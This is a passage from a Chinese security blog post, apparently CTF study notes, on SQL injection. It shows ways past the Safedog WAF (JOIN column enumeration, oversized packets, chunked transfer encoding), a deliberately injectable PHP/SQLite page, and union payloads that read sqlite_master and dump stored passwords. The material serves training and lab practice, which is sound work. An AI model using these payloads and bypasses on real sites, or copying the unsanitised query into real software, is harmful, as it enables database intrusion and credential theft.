<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> database_name, table_name <span class="keyword">FROM</span> mysql.innodb_table_stats</span><br></pre></td></tr></table></figure>

<h4 id="安全狗3-5绕过JOIN无列名报错注入"><a href="#安全狗3-5绕过JOIN无列名报错注入" class="headerlink" title="安全狗3.5绕过JOIN无列名报错注入"></a>安全狗3.5绕过JOIN无列名报错注入</h4><p>当column被过滤时，无法查询列名，可以使用JOIN无列名绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">select * from (select * from users as a JOIN users as b)c;</span><br><span class="line"></span><br><span class="line">把users这张表使用JOIN联合查询得到表c,再查询表c的所有内容,但是一次只会展示一个列名，所以需要用using依次查询</span><br><span class="line">如第一次查到列名为id,则查询下一个列名：</span><br><span class="line">select * from (select * from users as a JOIN users as b using(id))c;</span><br><span class="line">select * from (select * from users as a JOIN users as b using(id,username))c;</span><br><span class="line">.......</span><br></pre></td></tr></table></figure>



<h4 id="安全狗3-5超大数据包绕过"><a href="#安全狗3-5超大数据包绕过" class="headerlink" title="安全狗3.5超大数据包绕过"></a>安全狗3.5超大数据包绕过</h4><p>有时当提交数据超过检查范围时可以绕过拦截，可以在&#x2F;*xxx*&#x2F;中插入超大数据增加字符串数量</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/33.png"></p>
<h4 id="分块传输绕过最新版安全狗"><a href="#分块传输绕过最新版安全狗" class="headerlink" title="分块传输绕过最新版安全狗"></a>分块传输绕过最新版安全狗</h4><p>前提：对方网站支持分块传输</p>
<p>将POST提交的数据分散打乱成多块提交，对方会将我们提交的数据重新组装，从而绕过验证</p>
<p><strong>注意：分块传输的POST数据头部需要添加 Transfer-Encoding: Chunked,并且请求体需要两次换行，换行前的数字表示换行后字符串的长度（3:id&#x3D;,1:1,0）</strong></p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/34.png"></p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/35.png"></p>
<h4 id="sqlite"><a href="#sqlite" class="headerlink" title="sqlite"></a>sqlite</h4><p>sqlite和mysql等还是有些区别的，sqlite的每一个数据库就是一个文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">创建数据库:</span><br><span class="line"></span><br><span class="line">sqlite3 test.db</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/36.png"></p>
<p><strong>常用sqlite命令:</strong></p>
<table>
<thead>
<tr>
<th align="left">命令</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>.tables</code></td>
<td align="left">显示所有表</td>
</tr>
<tr>
<td align="left"><code>.schema 表名</code></td>
<td align="left">显示表的创建语句</td>
</tr>
<tr>
<td align="left"><code>.databases</code></td>
<td align="left">显示当前数据库</td>
</tr>
<tr>
<td align="left"><code>.exit</code> 或 <code>.quit</code></td>
<td align="left">退出</td>
</tr>
<tr>
<td align="left"><code>.help</code></td>
<td align="left">显示帮助信息</td>
</tr>
</tbody></table>
<p><strong>打开数据库</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Use &quot;.open FILENAME&quot; to reopen on a persistent database.</span><br><span class="line">sqlite&gt; .open sqltest.db</span><br></pre></td></tr></table></figure>

<p><strong>导入导出</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 导出</span><br><span class="line">$sqlite3 testDB.db .dump &gt; testDB.sql</span><br><span class="line"># 导入</span><br><span class="line">$sqlite3 testDB.db &lt; testDB.sql</span><br></pre></td></tr></table></figure>

<p><strong>创建表</strong></p>
<p>语句和mysql差不多</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sqlite&gt; create table test(</span><br><span class="line">   ...&gt; id INT PRIMARY KEY     NOT NULL,</span><br><span class="line">   ...&gt; name char(50) NOT NULL</span><br><span class="line">   ...&gt; );</span><br></pre></td></tr></table></figure>

<p><strong>查看表</strong></p>
<p>.tables 命令用来列出附加数据库中的所有表。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlite&gt; .tables</span><br><span class="line">test</span><br></pre></td></tr></table></figure>

<p>.schema 命令得到表的完整信息:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sqlite&gt; .schema test</span><br><span class="line">CREATE TABLE test(</span><br><span class="line">id INT PRIMARY KEY     NOT NULL,</span><br><span class="line">name char(50) NOT NULL</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>值得注意的一点是得到的结果是我们创建表时执行的命令语句，这也是sqlite的特点</p>
<p><strong>插入数据</strong></p>
<p>INSERT INTO 语句用于向数据库的某个表中添加新的数据行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlite&gt; insert into test (id,name) values (1,&#x27;alice&#x27;);</span><br><span class="line">sqlite&gt; insert into test (id,name) values (2,&#x27;bob&#x27;);</span><br></pre></td></tr></table></figure>

<p><strong>查询语句</strong></p>
<p>使用select关键字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">sqlite&gt; select * from test;</span><br><span class="line">id          name</span><br><span class="line">----------  ----------</span><br><span class="line">1           alice</span><br><span class="line">2           bob</span><br><span class="line"></span><br><span class="line">sqlite&gt; select name from test;</span><br><span class="line">name</span><br><span class="line">----------</span><br><span class="line">alice</span><br><span class="line">bob</span><br></pre></td></tr></table></figure>

<p>如果查询结果格式比较乱，需要设置格式化输出</p>
<p>示例代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">在数据库下创建一个表:</span><br><span class="line"></span><br><span class="line">sqlite&gt; create table user_data(</span><br><span class="line">   ...&gt; id INT PRIMARY KEY NOT NULL,</span><br><span class="line">   ...&gt; name char(50) NOT NULL,</span><br><span class="line">   ...&gt; passwd cahr(50) NOT NULL);</span><br><span class="line"></span><br><span class="line">sqlite&gt; insert into user_data (id,name,passwd) values (1,&#x27;admin&#x27;,&#x27;password&#x27;);</span><br><span class="line">sqlite&gt; insert into user_data (id,name,passwd) values (2,&#x27;bob&#x27;,&#x27;wowowow&#x27;);</span><br><span class="line">sqlite&gt; insert into user_data (id,name,passwd) values (3,&#x27;flag&#x27;,&#x27;flag&#123;test&#125;&#x27;);</span><br><span class="line">sqlite&gt; select * from user_data;</span><br><span class="line">1|admin|password</span><br><span class="line">2|bob|wowowow</span><br><span class="line">3|flag|flag&#123;test&#125;</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/37.png"></p>
<p>页面：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">    &lt;body&gt;</span><br><span class="line">        &lt;form action=&quot;&quot; method=&quot;POST&quot;&gt;</span><br><span class="line">            &lt;input type=&quot;text&quot; name=&quot;id&quot; size=&quot;80&quot;&gt;</span><br><span class="line">            &lt;input type=&quot;submit&quot;&gt;</span><br><span class="line">        &lt;/form&gt;</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">   class MyDB extends SQLite3</span><br><span class="line">   &#123;</span><br><span class="line">      function __construct()</span><br><span class="line">      &#123;</span><br><span class="line">         $this-&gt;open(&#x27;user.db&#x27;);</span><br><span class="line">      &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   $db = new MyDB();</span><br><span class="line">   if(!$db)&#123;</span><br><span class="line">      echo $db-&gt;lastErrorMsg();</span><br><span class="line">   &#125; else &#123;</span><br><span class="line">      echo &quot;Opened database successfully\n&lt;/br&gt;&quot;;</span><br><span class="line">   &#125;</span><br><span class="line"></span><br><span class="line">   $id = $_POST[&#x27;id&#x27;];</span><br><span class="line">   $sql =&lt;&lt;&lt;EOF</span><br><span class="line">      SELECT * from user_data where id=&#x27;$id&#x27;;</span><br><span class="line">EOF;</span><br><span class="line">    $ret = $db-&gt;query($sql);</span><br><span class="line">    if($ret==FALSE)&#123;</span><br><span class="line">        echo &quot;Error in fetch &quot;.$db-&gt;lastErrorMsg();</span><br><span class="line">    &#125;</span><br><span class="line">    else&#123;</span><br><span class="line">            while($row = $ret-&gt;fetchArray(SQLITE3_ASSOC) )&#123;</span><br><span class="line">            echo &quot;ID = &quot;. $row[&#x27;id&#x27;] . &quot;&lt;/br&gt;&quot;;</span><br><span class="line">            echo &quot;NAME = &quot;. $row[&#x27;name&#x27;] .&quot;&lt;/br&gt;&quot;;</span><br><span class="line">            echo &quot;PASS = &quot;. $row[&#x27;passwd&#x27;] .&quot;&lt;/br&gt;&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        var_dump($ret-&gt;fetchArray(SQLITE3_ASSOC));</span><br><span class="line">    &#125;   </span><br><span class="line"></span><br><span class="line">   $db-&gt;close();</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<p>sqlite注入的union联合查询和sql注入前面的查询方法一样:</p>
<p>使用order by确定查询字段数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; order by 3;</span><br><span class="line">1&#x27; order by 4;</span><br></pre></td></tr></table></figure>



<p>查看回显位:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0&#x27; union select 1,2,3;</span><br></pre></td></tr></table></figure>



<p>查版本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0&#x27; union select 1,2,sqlite_version();</span><br></pre></td></tr></table></figure>



<p>前置知识:</p>
<ul>
<li>1.<strong>sqlite_master</strong> 是 SQLite 的<strong>系统表</strong>，存储了数据库中所有表、索引、视图和触发器的元数据</li>
</ul>
<p>sql</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-- 查看 sqlite_master 的结构</span><br><span class="line">SELECT * FROM sqlite_master;</span><br></pre></td></tr></table></figure>

<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/38.png"></p>
<p><strong>表结构</strong>：</p>
<table>
<thead>
<tr>
<th align="left">字段</th>
<th align="left">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>type</code></td>
<td align="left">对象类型：’table’、’index’、’view’、’trigger’</td>
</tr>
<tr>
<td align="left"><code>name</code></td>
<td align="left">对象名称</td>
</tr>
<tr>
<td align="left"><code>tbl_name</code></td>
<td align="left">表名（对于表，与 name 相同）</td>
</tr>
<tr>
<td align="left"><code>rootpage</code></td>
<td align="left">内部使用</td>
</tr>
<tr>
<td align="left"><code>sql</code></td>
<td align="left">创建对象的完整 SQL 语句</td>
</tr>
</tbody></table>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/39.png"></p>
<p><code>sql</code> 列里存的是<strong>创建这个表时的完整 SQL 语句</strong>（也就是表的结构）</p>
<p>当你执行这个命令创建表时：</p>
<p>sql</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">CREATE TABLE user_data(</span><br><span class="line">    id INT PRIMARY KEY,</span><br><span class="line">    name char(50),</span><br><span class="line">    passwd char(50)</span><br><span class="line">);</span><br></pre></td></tr></table></figure>



<p>SQLite 会自动把这条 SQL 语句<strong>原样保存</strong>到 <code>sqlite_master</code> 表的 <code>sql</code> 列里</p>
<p><strong>如上图的test.db数据库:</strong></p>
<table>
<thead>
<tr>
<th align="left">字段</th>
<th align="left">值1（表）</th>
<th align="left">值2（索引）</th>
<th align="left">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>type</strong></td>
<td align="left"><code>table</code></td>
<td align="left"><code>index</code></td>
<td align="left">对象类型</td>
</tr>
<tr>
<td align="left"><strong>name</strong></td>
<td align="left"><code>user_data</code></td>
<td align="left"><code>sqlite_autoindex_user_data_1</code></td>
<td align="left">对象名称</td>
</tr>
<tr>
<td align="left"><strong>tbl_name(表名)</strong></td>
<td align="left"><code>user_data</code></td>
<td align="left"><code>user_data</code></td>
<td align="left">所属表名</td>
</tr>
<tr>
<td align="left"><strong>rootpage</strong></td>
<td align="left"><code>2</code></td>
<td align="left"><code>3</code></td>
<td align="left">内部页面编号</td>
</tr>
<tr>
<td align="left"><strong>sql</strong></td>
<td align="left"><code>CREATE TABLE...</code></td>
<td align="left">(空)</td>
<td align="left">创建对象的SQL语句</td>
</tr>
</tbody></table>
<p><strong>表名和列名</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">0&#x27; union select 1,2,sql from sqlite_master;</span><br><span class="line">or</span><br><span class="line">0&#x27; union select 1,2,sql from sqlite_master where type=&#x27;table&#x27;;</span><br><span class="line">or</span><br><span class="line">0&#x27; union select 1,2,sql from sqlite_master where type=&#x27;table&#x27; and name=&#x27;user_data&#x27;;</span><br></pre></td></tr></table></figure>



<p>如下查询结果即为建表语句：</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/40.png"></p>
<p>或者：<br>多条记录时用group_concat聚合或者使用limit</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">0&#x27; union select 1,2,group_concat(tbl_name) FROM sqlite_master WHERE type=&#x27;table&#x27; and tbl_name NOT like &#x27;sqlite_%&#x27; --</span><br><span class="line">或者使用limit来输出一行结果</span><br><span class="line">0&#x27; union select 1,2,tbl_name FROM sqlite_master WHERE type=&#x27;table&#x27; and tbl_name NOT like &#x27;sqlite_%&#x27; limit 2 offset 1 --</span><br></pre></td></tr></table></figure>



<p>limit后面接的数字是截取的行数，而offest后面接的数字则为第一次返回结果中的删除数。在上述查询中，limit提取了两个表名，然后第一个被offset删除掉，所以我们获得了第二个表名。</p>
<p>另外可以通过下面的payload获取到格式化过的列名：</p>
<p>LIKE 和 NOT LIKE 是什么？</p>
<p><code>LIKE</code> 是 SQL 中的<strong>模糊匹配</strong>操作符，用于匹配字符串模式</p>
<ul>
<li><code>%</code> 代表<strong>任意多个字符</strong>（包括0个）</li>
<li><code>_</code> 代表<strong>单个任意字符</strong></li>
</ul>
<p>拆解这个条件</p>
<p>sql</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tbl_name NOT LIKE &#x27;sqlite_%&#x27;</span><br></pre></td></tr></table></figure>



<p>意思是：</p>
<ul>
<li><code>tbl_name</code> 字段的值 <strong>不匹配</strong> 模式 <code>&#39;sqlite_%&#39;</code></li>
<li><code>&#39;sqlite_%&#39;</code> 匹配所有以 <code>&quot;sqlite_&quot;</code> 开头的字符串</li>
</ul>
<p><strong>为什么要过滤掉 sqlite_%？</strong></p>
<p>SQLite 系统内部会有一些<strong>以 “sqlite_” 开头的系统对象</strong>，这些是 SQLite 自己用的，不是用户创建的表。</p>
<p><strong>常见的 sqlite_ 开头的对象：</strong></p>
<table>
<thead>
<tr>
<th align="left">对象名</th>
<th align="left">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>sqlite_sequence</code></td>
<td align="left">用于 AUTOINCREMENT 的序列表</td>
</tr>
<tr>
<td align="left"><code>sqlite_stat1</code></td>
<td align="left">统计信息表</td>
</tr>
<tr>
<td align="left"><code>sqlite_stat2</code></td>
<td align="left">统计信息表</td>
</tr>
<tr>
<td align="left"><code>sqlite_autoindex_xxx</code></td>
<td align="left">自动创建的索引</td>
</tr>
</tbody></table>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0&#x27; union select 1,2,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,&#x27;(&#x27;)+1)),instr((substr(sql,instr(sql,&#x27;(&#x27;)+1)),&#x27;`&#x27;)),&quot;TEXT&quot;,&#x27;&#x27;),&quot;INTEGER&quot;,&#x27;&#x27;),&quot;AUTOINCREMENT&quot;,&#x27;&#x27;),&quot;PRIMARY KEY&quot;,&#x27;&#x27;),&quot;UNIQUE&quot;,&#x27;&#x27;),&quot;NUMERIC&quot;,&#x27;&#x27;),&quot;REAL&quot;,&#x27;&#x27;),&quot;BLOB&quot;,&#x27;&#x27;),&quot;NOT NULL&quot;,&#x27;&#x27;),&quot;,&quot;,&#x27;~~&#x27;) from sqlite_master where type=&#x27;table&#x27; and name=&#x27;user_data&#x27; --</span><br></pre></td></tr></table></figure>





<p><strong>查数据</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0&#x27; union select id,name,passwd from user_data;</span><br></pre></td></tr></table></figure>



<p>使用group_concat连接查询结果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0&#x27; union select 1,2,group_concat(passwd) from user_data;</span><br></pre></td></tr></table></figure>





<p>注释符：(–)</p>
<p>为什么 MySQL 常用 –+？</p>
<p>在 <strong>MySQL</strong> 中：</p>
<ul>
<li><code>--</code> 后面<strong>必须跟一个空格</strong>才会被识别为注释</li>
<li>但在 URL 中，空格会被编码或过滤</li>
<li>所以用 <code>+</code> 代替空格（<code>+</code> 在 URL 中被解析为空格）</li>
</ul>

    </div>
  </article>
  <div class="ccbyncsa">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="copyright">
                    <div class="author">
                        <p>作者</p>
                        <p>L1uxsn</p>
                    </div>
                    <div class="title">
                        <p>标题</p>
                        <p>SQL注入相关</p>
                    </div>
                        <div class="publish">
                            <p>发布于</p>
                            <p>2026-07-12</p>
                        </div>
                    <div class="ccbyncsa-icon">
                        <p>授权协议</p>
                        <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                        <p class="ccbyncsa-icon-imgs" style="display: flex;">
                        <img src="/images/cc.svg" alt="cc">
                        <img src="/images/by.svg" alt="by">
                        <img src="/images/nc.svg" alt="nc">
                        <img src="/images/sa.svg" alt="sa">
                        </p>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
  <nav class="post-pagination">
    
      <div class="post-prev">
        <span class="nav-label">上一篇</span>
        <a href="/2026/07/11/SSRF/">SSRF</a>
      </div>
    
    
      <div class="post-next">
        <span class="nav-label">下一篇</span>
        <a href="/2026/07/13/XXE%E6%BC%8F%E6%B4%9E/">XXE漏洞</a>
      </div>
    
  </nav>
  
<link href="https://unpkg.com/@waline/client@v3/dist/waline.css" rel="stylesheet">
<div class="comments-container night">
    <div id="waline"></div>
    <script type="module">
      import { init } from 'https://unpkg.com/@waline/client@v3/dist/waline.js';
      init({
        el: '#waline',
        serverURL: '',
        dark: 'html.dark',
        pageview: true,
        commentClassName: 'prose prose-neutral dark:prose-invert min-w-0 max-w-none',
        lang: 'zh-CH', //
        avatar: 'mm', //
        meta: ['nick', 'mail'], //
        pageSize: 10, //
        visitor: true, //
        commentCount: true, //
        requiredFields: ['nick', 'mail'], //
      });
    </script>
    </div>


</div>

<script src="/js/copy.js"></script>

<aside class="sidebar-container sidebar-right">
    <div class="sidebar-bg">
        <p id="date"></p>
<script>
  function updateDate() {
    var now = new Date();
    var dateString = now.toISOString().slice(0, 10);
    document.getElementById('date').textContent = dateString;
  }

  window.addEventListener('load', function() {
    updateDate();
    // 更新频率为每5分钟更新一次，减少不必要的更新
    setInterval(updateDate, 300000);
  });
</script>
        <span id="clock" role="timer" aria-live="polite"></span>


<script>
  document.addEventListener('DOMContentLoaded', function() {
    const clockElement = document.getElementById('clock');
    let timerInterval;

    // 格式化时间函数
    function formatTime(unit) {
      return unit < 10 ? '0' + unit : unit;
    }

    // 更新时钟 - 包含秒
    function updateClock() {
      const now = new Date();
      const hours = formatTime(now.getHours());
      const minutes = formatTime(now.getMinutes());
      const seconds = formatTime(now.getSeconds());
      clockElement.textContent = `${hours}:${minutes}:${seconds}`;
    }

    // 初始化时钟
    function startClock() {
      // 立即更新一次时间
      updateClock();
      // 每秒更新一次
      timerInterval = setInterval(updateClock, 1000);
    }

    // 页面可见性变化时的优化
    document.addEventListener('visibilitychange', function() {
      if (document.hidden) {
        // 页面不可见时停止更新
        clearInterval(timerInterval);
      } else {
        // 页面重新可见时，重新开始
        clearInterval(timerInterval);
        startClock();
      }
    });

    // 启动时钟
    startClock();
  });
</script>


    </div>
    <div class="sidebar-bg">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3"><span class="toc-number">1.</span> <span class="toc-text">SQL注入相关</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DNSlog%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.</span> <span class="toc-text">DNSlog注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#POST%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.</span> <span class="toc-text">POST注入</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#POST-union%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.1.</span> <span class="toc-text">POST union注入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#POST%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.2.</span> <span class="toc-text">POST报错注入</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP%E5%A4%B4%E6%B3%A8%E5%85%A5"><span class="toc-number">1.3.</span> <span class="toc-text">HTTP头注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#uagent%E6%B3%A8%E5%85%A5"><span class="toc-number">1.3.1.</span> <span class="toc-text">uagent注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Referer%E6%B3%A8%E5%85%A5"><span class="toc-number">1.3.2.</span> <span class="toc-text">Referer注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Cookie%E6%B3%A8%E5%85%A5"><span class="toc-number">1.3.3.</span> <span class="toc-text">Cookie注入</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.</span> <span class="toc-text">sql注入绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%A8%E9%87%8A%E7%AC%A6%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.1.</span> <span class="toc-text">注释符号绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#and%E5%92%8Cor%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.2.</span> <span class="toc-text">and和or过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.3.</span> <span class="toc-text">空格绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%97%E5%8F%B7%E8%BF%87%E6%BB%A4join%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.4.</span> <span class="toc-text">逗号过滤join绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#union%E5%92%8Cselect%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.5.</span> <span class="toc-text">union和select绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="toc-number">1.4.6.</span> <span class="toc-text">宽字节注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%8B%974-0-26550%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.7.</span> <span class="toc-text">安全狗4.0.26550绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%8B%973-5-12048%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.8.</span> <span class="toc-text">安全狗3.5.12048绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%8B%973-5%E7%BB%95%E8%BF%87JOIN%E6%97%A0%E5%88%97%E5%90%8D%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">1.4.9.</span> <span class="toc-text">安全狗3.5绕过JOIN无列名报错注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%8B%973-5%E8%B6%85%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%8C%85%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.10.</span> <span class="toc-text">安全狗3.5超大数据包绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%86%E5%9D%97%E4%BC%A0%E8%BE%93%E7%BB%95%E8%BF%87%E6%9C%80%E6%96%B0%E7%89%88%E5%AE%89%E5%85%A8%E7%8B%97"><span class="toc-number">1.4.11.</span> <span class="toc-text">分块传输绕过最新版安全狗</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sqlite"><span class="toc-number">1.4.12.</span> <span class="toc-text">sqlite</span></a></li></ol></li></ol></li></ol>
    </div>
    <div class="sidebar-bg">
        <div class="card-tags">
            
                <a href="/tags/CTF/" class="tag" aria-label="标签: #CTF">#CTF</a>
            
                <a href="/tags/Web%E5%AE%89%E5%85%A8/" class="tag" aria-label="标签: #Web安全">#Web安全</a>
            
                <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" class="tag" aria-label="标签: #SQL注入">#SQL注入</a>
            
                <a href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/" class="tag" aria-label="标签: #数据库">#数据库</a>
            
        </div>
    </div>
    <div>
        <div class="categories-list">
            
                <div class="category-item">
                    <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" aria-label="分类: 网络安全">
                        网络安全
                        <span>(12)</span>
                    </a>
                </div>
            
        </div>
    </div>
</aside>

    <!-- No categories available -->


    <footer>
    <span id="busuanzi_container_site_pv" style="display: inline;"></span>
    <span>👁<span id="busuanzi_value_site_pv"></span></span>
    <div class="padding border border-sub border-dotted fadein-right">
        <span style="color:aliceblue">👤<span id="busuanzi_value_site_uv"></span></span>
    </div>
    <span>
        由 <a target="_blank" rel="noopener" href="https://hexo.io" alt="Hexo">
